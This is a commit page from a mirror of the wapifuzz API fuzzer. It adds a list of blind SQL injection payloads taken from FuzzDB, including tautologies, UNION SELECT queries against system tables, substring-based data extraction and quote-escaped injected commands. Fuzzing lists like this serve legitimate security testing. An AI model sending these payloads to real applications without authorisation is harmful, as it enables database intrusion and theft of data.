github-mirrors/wapifuzz
1
0
Fork 0
mirror of https://github.com/ysoftdevs/wapifuzz.git synced 2026-04-25 18:18:49 +02:00
Code Issues 1 Packages Projects Releases 1 Wiki Activity

Folder removed

Browse Source
This commit is contained in:
Jan Stárek
2019-11-20 18:49:01 +01:00
parent 4ea29e2464
commit 955bddda2f
54 changed files with 163 additions and 163 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
fuzzer/payloads/lists/sql-injection/mysql-blind.txt Normal file
View File

@@ -0,0 +1,22 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl